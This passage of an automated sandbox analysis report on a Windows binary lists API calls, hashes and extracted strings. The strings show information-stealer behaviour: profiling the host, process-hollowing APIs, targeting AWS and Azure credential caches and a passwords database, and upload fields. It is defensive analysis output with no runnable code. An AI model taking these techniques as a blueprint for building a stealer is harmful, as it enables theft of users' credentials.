                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DriveLogicalStrings
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2022863570-0
                                                                                                                                                                        • Opcode ID: 8c542e350f76c64ba2947ebefc2c4c209e1ed9992030a914c8680c1d963a6ffa
                                                                                                                                                                        • Instruction ID: 3372cba57e6a2eaa1d879160e3e40b8e55c167cdc0f8792e2e76d0a9355f6cda
                                                                                                                                                                        • Opcode Fuzzy Hash: 8c542e350f76c64ba2947ebefc2c4c209e1ed9992030a914c8680c1d963a6ffa
                                                                                                                                                                        • Instruction Fuzzy Hash: 60F039B1A00109DFEB18DF64CC91FA97BB0EF48304F14406EE646D7391EA3499488B94
                                                                                                                                                                        APIs
                                                                                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 0041803A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileInternetRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 778332206-0
                                                                                                                                                                        • Opcode ID: 9e5e9da609210bfc34dd9cb12f2909040bfa62032e106f0ed9d883535949a094
                                                                                                                                                                        • Instruction ID: b6fb03e5c75202f5bdf7690399e95dcf118b51c36a476518bdd44740d121225c
                                                                                                                                                                        • Opcode Fuzzy Hash: 9e5e9da609210bfc34dd9cb12f2909040bfa62032e106f0ed9d883535949a094
                                                                                                                                                                        • Instruction Fuzzy Hash: BDE04F31B1012B9FEB14DB60DC84E5233BABBC8704B108468D105A7115E6B1A907CF91
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00431714
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                                                        • Opcode ID: 6f05d8723b5827563a8e2a5ad662007980ebd3022c160d528d2925704428c687
                                                                                                                                                                        • Instruction ID: d221b39bd8923f8965f75fecf21c573cbd254d11a1a1239279671324a2e5c7fd
                                                                                                                                                                        • Opcode Fuzzy Hash: 6f05d8723b5827563a8e2a5ad662007980ebd3022c160d528d2925704428c687
                                                                                                                                                                        • Instruction Fuzzy Hash: 6DE08C316062029FE3188B14CC95E6132A2AF85704F40461CE401CE289EBA0E440CA00

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 4377b7-438a25 call 431c61 228 438a27-438edb lstrlenA 0->228
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00438E10
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen
                                                                                                                                                                        • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                        • API String ID: 1659193697-1014693891
                                                                                                                                                                        • Opcode ID: f0e15071124958108c83a44bf0558e9262c5a0f03f0f077679f2092a3c7a231b
                                                                                                                                                                        • Instruction ID: f4255d3571cfc0418470bd4017393c5e081cc2852bd45eb6678b6c8cb60402ba
                                                                                                                                                                        • Opcode Fuzzy Hash: f0e15071124958108c83a44bf0558e9262c5a0f03f0f077679f2092a3c7a231b
                                                                                                                                                                        • Instruction Fuzzy Hash: 91E2EC753222008FC305DF6CDCD5DA9B7E5FF893083A8126CE409D7321DE65AE568B6A

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 286 44163a-44224d LoadLibraryA * 6
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryA.KERNEL32(0066B8DB), ref: 004420E9
                                                                                                                                                                        • LoadLibraryA.KERNEL32(0066B8F3), ref: 0044212F
                                                                                                                                                                        • LoadLibraryA.KERNEL32(0066B8FF), ref: 00442152
                                                                                                                                                                        • LoadLibraryA.KERNEL32(0066B926), ref: 004421BB
                                                                                                                                                                        • LoadLibraryA.KERNEL32(0066B931), ref: 004421DE
                                                                                                                                                                        • LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00442224
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID: CreateProcessA$GetThreadContext$ReadProcessMemory$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                        • API String ID: 1029625771-2674769033
                                                                                                                                                                        • Opcode ID: d2e29452b506b0bcd63bc073f10d87eac2d6dbddab4f12e8569b0d0ddb8d4792
                                                                                                                                                                        • Instruction ID: fb63d92a9f115e913b2f9b718a076d9a6120d16dab0c00aa961a01dad6639e5b
                                                                                                                                                                        • Opcode Fuzzy Hash: d2e29452b506b0bcd63bc073f10d87eac2d6dbddab4f12e8569b0d0ddb8d4792
                                                                                                                                                                        • Instruction Fuzzy Hash: 3C729EB4291240EFCB86EF19ED99811B7AAFB8D306316816DD87587374F7B1AC10DB09

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,build_id,?,",?,0066CA58,?,------), ref: 004167AF
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,",?,?,file_data,?,build_id,?,",?,0066CA58,?,------), ref: 004167CE
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,?,",?,?,file_data,?,build_id,?,",?,0066CA58), ref: 004167F1
                                                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000000,?,?,",?,?,file_data,?,build_id,?,",?,0066CA58), ref: 0041682B
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,file_data,?,build_id,?,",?,0066CA58,?,------), ref: 0041684E
                                                                                                                                                                        • memcpy.MSVCRT(00000000,?,?,?,?,file_data,?,build_id,?,",?,0066CA58,?,------), ref: 00416859
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,file_data,?,build_id,?,",?,0066CA58,?,------), ref: 0041687C
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,file_data,?,build_id,?,",?,0066CA58,?,------), ref: 004168AB
                                                                                                                                                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,file_data,?,build_id,?,",?,0066CA58), ref: 004168B2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$memcpy$AllocateHeap
                                                                                                                                                                        • String ID: "$------$build_id$file_data
                                                                                                                                                                        • API String ID: 2686163794-481700987
                                                                                                                                                                        • Opcode ID: dd825d201735d93efb7ef9095eeddf40bcf2c6963a0708d52d7b0c9172e33aa5
                                                                                                                                                                        • Instruction ID: 4151677d09384e44cf8f26b5bc9ab36b3bcb42e4d8bcf8d9f074c6dc33b07d58
                                                                                                                                                                        • Opcode Fuzzy Hash: dd825d201735d93efb7ef9095eeddf40bcf2c6963a0708d52d7b0c9172e33aa5
                                                                                                                                                                        • Instruction Fuzzy Hash: 262216713015185FC606EB9DDC91A6EB3EBBFD87093084039E916C3366CA64DE198A9E

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset
                                                                                                                                                                        • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                                                                                                                                                        • API String ID: 2221118986-3645552435
                                                                                                                                                                        • Opcode ID: 4f362a5bf8fecd7bf318df3dfef4ebbe921289761eb1be4bf1afdda7e548a895
                                                                                                                                                                        • Instruction ID: bc471db5ab473fb34068e527421e82f64e62dfe863696c80f29b4267a5bc31fb
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f362a5bf8fecd7bf318df3dfef4ebbe921289761eb1be4bf1afdda7e548a895
                                                                                                                                                                        • Instruction Fuzzy Hash: 3DB159B6B002149FC719DF68DD91D9933EABB8C314B090369E805D7322EEB4E958CF59

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 490 41e1db-41e345 RtlAllocateHeap lstrcatA * 4 HeapFree RtlFreeHeap DeleteFileA 503 41e349-41e34f 490->503 504 41e354 503->504 504->504
                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,000F423F), ref: 0041E204
                                                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0041E224
                                                                                                                                                                        • lstrcatA.KERNEL32(?,0067CC4C), ref: 0041E254
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 0041E26F
                                                                                                                                                                        • lstrcatA.KERNEL32(?,_passwords.db), ref: 0041E29F
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041E301
                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 0041E320
                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 0041E33C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
